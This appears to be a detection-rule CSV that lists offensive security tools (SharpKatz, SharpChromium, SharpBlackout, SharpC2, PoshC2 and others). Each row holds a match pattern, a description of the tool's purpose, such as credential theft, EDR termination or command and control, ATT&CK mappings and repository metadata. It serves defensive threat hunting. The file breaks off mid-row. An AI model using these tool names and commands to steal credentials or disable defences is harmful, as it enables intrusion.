"*sharp SharpKatz --Command logonpasswords*",".{0,1000}sharp\sSharpKatz\s\-\-Command\slogonpasswords.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpMiniDump*",".{0,1000}sharp\sSharpMiniDump.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp Sharp-SMBExec *",".{0,1000}sharp\sSharp\-SMBExec\s.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpSpray*",".{0,1000}sharp\sSharpSpray.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpZeroLogon*",".{0,1000}sharp\sSharpZeroLogon.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp StickyNotesExtract*",".{0,1000}sharp\sStickyNotesExtract.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp winPEAS*",".{0,1000}sharp\swinPEAS.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp_collection.insert(*",".{0,1000}sharp_collection\.insert\(.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*Sharp_v4_x64*.bin*",".{0,1000}Sharp_v4_x64.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Sharp_v4_x86*.bin*",".{0,1000}Sharp_v4_x86.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*sharpadidnsdump.*",".{0,1000}sharpadidnsdump\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpAdidnsdumpManager*",".{0,1000}SharpAdidnsdumpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpAdidnsdumpMenu*",".{0,1000}SharpAdidnsdumpMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpADWS 1.0.0-beta - Copyright*",".{0,1000}SharpADWS\s1\.0\.0\-beta\s\-\sCopyright.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*SharpADWS.exe*",".{0,1000}SharpADWS\.exe.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*SharpAllowedToAct.exe*",".{0,1000}SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sharpapplocker*",".{0,1000}sharpapplocker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpAppLocker.exe*",".{0,1000}SharpAppLocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpAzbelt-main*",".{0,1000}SharpAzbelt\-main.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*SharpBlackout* -p *",".{0,1000}SharpBlackout.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackOut.csproj*",".{0,1000}SharpBlackOut\.csproj.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackout.exe*",".{0,1000}SharpBlackout\.exe.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackOut.pdb*",".{0,1000}SharpBlackOut\.pdb.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackOut.sln*",".{0,1000}SharpBlackOut\.sln.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackout-main*",".{0,1000}SharpBlackout\-main.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlock -*",".{0,1000}SharpBlock\s\-.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*SharpBlock.csproj*",".{0,1000}SharpBlock\.csproj.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*SharpBlock.exe*",".{0,1000}SharpBlock\.exe.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*SharpBlock.sln*",".{0,1000}SharpBlock\.sln.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*SharpBuster.AssemblyInfo.cs*",".{0,1000}SharpBuster\.AssemblyInfo\.cs.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*SharpBypassUAC*",".{0,1000}SharpBypassUAC.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Use SharpBypassUAC e.g. from a CobaltStrike beacon","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SharpBypassUAC.exe*",".{0,1000}SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpC2 *",".{0,1000}SharpC2\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2*.cs*",".{0,1000}SharpC2.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2*.exe*",".{0,1000}SharpC2.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*sharpc2*client-windows.zip*",".{0,1000}sharpc2.{0,1000}client\-windows\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2.*",".{0,1000}SharpC2\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2.API*",".{0,1000}SharpC2\.API.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2Event*",".{0,1000}SharpC2Event.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2Hub*",".{0,1000}SharpC2Hub.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2Webhook*",".{0,1000}SharpC2Webhook.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpCalendar.exe*",".{0,1000}SharpCalendar\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" "*SharpCat.exe*",".{0,1000}SharpCat\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","17","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" "*SharpChisel.exe*",".{0,1000}SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpChrome backupkey*",".{0,1000}SharpChrome\sbackupkey.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpChrome.cs*",".{0,1000}SharpChrome\.cs.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpChrome.exe*",".{0,1000}SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sharpchromium *",".{0,1000}sharpchromium\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpChromium.csproj*",".{0,1000}SharpChromium\.csproj.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpChromium.exe*",".{0,1000}SharpChromium\.exe.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpChromium.exe*",".{0,1000}SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpChromium.sln*",".{0,1000}SharpChromium\.sln.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpChromium-master*",".{0,1000}SharpChromium\-master.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpClipHistory*",".{0,1000}SharpClipHistory.{0,1000}","offensive_tool_keyword","SharpClipHistory","SharpClipHistory is a .NET 4.5 application written in C# that can be used to read the contents of a users clipboard history in Windows 10 starting from the 1809 Build.","T1115 - T1113 - T1015 - T1053 - T1059","TA0003 - TA0007","N/A","N/A","Information Gathering","https://github.com/FSecureLABS/SharpClipHistory","1","1","N/A","N/A","2","188","33","2020-01-23T13:39:13Z","2019-04-25T22:17:08Z" "*sharpcloud.cna*",".{0,1000}sharpcloud\.cna.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud.csproj*",".{0,1000}SharpCloud\.csproj.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud.exe*",".{0,1000}SharpCloud\.exe.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft 